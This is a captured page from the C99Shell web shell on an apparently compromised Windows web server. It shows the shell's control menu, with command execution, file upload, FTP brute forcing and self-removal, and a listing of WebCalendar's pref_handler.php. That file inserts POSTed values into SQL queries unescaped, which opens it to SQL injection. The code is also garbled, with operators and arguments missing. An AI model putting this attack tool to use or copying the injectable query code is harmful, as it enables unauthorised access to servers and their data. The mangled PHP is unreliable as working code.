!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

C:\Intranet\C\xampp\htdocs\php\OAB\WebCalendar-1.0.2\   drwxrwxrwx
Free 4.09 GB of 39.52 GB (10.36%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pref_handler.php (1.84 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once 'includes/init.php';

$error "";

$updating_public false;;
if ( 
$is_admin && ! empty ( $public ) && $public_access == "Y" ) {
  
$updating_public true;
  
$prefuser "__public__";
} elseif ((
$user != $login) && ($is_admin || $is_nonuser_admin)) {
  
$prefuser "$user";
} else {
  
$prefuser "$login";
}

while ( list ( 
$key$value ) = each $HTTP_POST_VARS ) ) {
  
$setting substr $key);
  
$prefix substr $key0);
  if ( 
$key == 'user' )
    continue;
  
// validate key name.  should start with "pref_" and not include
  // any unusual characters that might cause SQL injection
  
if ( ! preg_match '/pref_[A-Za-z0-9_]+$/'$key ) ) {
    
die_miserable_death 'Invalid admin setting name "' .
      
$key '"' );
  }
  
//echo "Setting = $setting, key = $key, prefix = $prefix <br />\n";
  
if ( strlen $setting ) > && $prefix == "pref_" ) {
    
$sql =
      
"DELETE FROM webcal_user_pref WHERE cal_login = '$prefuser' " .
      
"AND cal_setting = '$setting'";
    
dbi_query $sql );
    if ( 
strlen $value ) > ) {
      
$sql "INSERT INTO webcal_user_pref " .
        
"( cal_login, cal_setting, cal_value ) VALUES " .
        
"( '$prefuser', '$setting', '$value' )";
      if ( ! 
dbi_query $sql ) ) {
        
$error "Unable to update preference: " dbi_error () .
    
"<br /><br /><span style=\"font-weight:bold;\">SQL:</span> $sql";
        break;
      }
    }
  }
}

if ( empty ( 
$error ) ) {
  if ( 
$updating_public ) {
    
do_redirect "pref.php?public=1" );
  } elseif ((
$is_admin || $is_nonuser_admin) && $login != $user ) {
    
do_redirect "pref.php?user=$user);
  } else {
    
do_redirect "pref.php" );
  }
}
print_header();
?>

<h2><?php etranslate("Error")?></h2>

<?php etranslate("The following error occurred")?>:
<blockquote>
<?php echo $error?>
</blockquote>

<?php print_trailer(); ?>

</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--